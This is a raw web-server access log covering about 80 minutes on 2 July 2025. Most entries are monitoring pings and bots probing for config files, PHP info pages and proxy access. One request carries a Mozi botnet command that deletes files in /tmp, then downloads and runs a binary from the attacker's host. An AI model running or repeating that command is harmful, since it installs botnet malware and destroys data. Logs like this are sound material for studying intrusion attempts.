77.90.153.48 - - [02/Jul/2025:10:29:49 +0200] "GET /spip.php?page=spip_pass HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/117.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.248.188.56 - - [02/Jul/2025:10:30:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.188.56 - - [02/Jul/2025:10:30:17 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
104.248.188.56 - - [02/Jul/2025:10:30:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.188.56 - - [02/Jul/2025:10:30:18 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.188.56 - - [02/Jul/2025:10:30:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.188.56 - - [02/Jul/2025:10:30:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.248.188.56 - - [02/Jul/2025:10:30:19 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
104.248.188.56 - - [02/Jul/2025:10:30:19 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
104.248.188.56 - - [02/Jul/2025:10:30:19 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.188.56 - - [02/Jul/2025:10:30:20 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.188.56 - - [02/Jul/2025:10:30:20 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:10:31:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:10:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.166.164.87 - - [02/Jul/2025:10:35:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
188.166.164.87 - - [02/Jul/2025:10:35:49 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [02/Jul/2025:10:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:10:37:15 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET /php_info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
141.98.11.152 - - [02/Jul/2025:10:38:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
212.91.247.32 - - [02/Jul/2025:10:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:10:39:54 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:10:48:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:10:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.178.110.146 - - [02/Jul/2025:10:49:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
204.76.203.206 - - [02/Jul/2025:10:49:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:10:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:10:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:10:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:10:53:29 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:10:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:10:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:11:00:41 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:11:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:11:03:09 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.67.21 - - [02/Jul/2025:11:03:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
35.202.9.133 - - [02/Jul/2025:11:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
212.91.247.32 - - [02/Jul/2025:11:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:11:05:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:11:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:11:06:30 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
162.216.149.121 - - [02/Jul/2025:11:06:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [02/Jul/2025:11:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:11:11:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.53.84 - - [02/Jul/2025:11:11:39 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.208.158.206 - - [02/Jul/2025:11:11:56 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (mitsec)"
212.91.247.32 - - [02/Jul/2025:11:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:11:13:13 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:11:15:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.245.230.129 - - [02/Jul/2025:11:15:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
111.118.128.47 - - [02/Jul/2025:11:15:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:11:21:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:11:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:11:24:31 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.67.28.49 - - [02/Jul/2025:11:24:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://89.67.28.49:51493/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.247.32 - - [02/Jul/2025:11:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [02/Jul/2025:11:29:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:11:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:11:32:01 +0200] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:11:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.106.192.208 - - [02/Jul/2025:11:33:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:11:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.247.137.21 - - [02/Jul/2025:11:35:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.247.32 - - [02/Jul/2025:11:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [02/Jul/2025:11:36:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.121.84.149 - - [02/Jul/2025:11:36:19 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
87.121.84.130 - - [02/Jul/2025:11:36:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:11:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Jul/2025:11:39:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
23.94.187.142 - - [02/Jul/2025:11:39:39 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
23.94.187.142 - - [02/Jul/2025:11:39:39 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
23.94.187.142 - - [02/Jul/2025:11:39:39 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
23.94.187.142 - - [02/Jul/2025:11:39:39 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
23.94.187.142 - - [02/Jul/2025:11:39:39 +0200] "GET http://whatismyip.akamai.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.247.32 - - [02/Jul/2025:11:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.149.188 - - [02/Jul/2025:11:40:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:11:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Jul/2025:11:41:14 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
43.130.111.40 - - [02/Jul/2025:11:41:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:11:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.152.4 - - [02/Jul/2025:11:43:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:11:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.7.213 - - [02/Jul/2025:11:44:21 +0200] "GET /squid-internal-mgr/cachemgr.cgi HTTP/1.1" 404 336 "-" "Mozilla/5.0 zgrab/0.x"
212.91.247.32 - - [02/Jul/2025:11:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:11:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.142.101 - - [02/Jul/2025:11:48:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.113.127 - - [02/Jul/2025:11:48:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
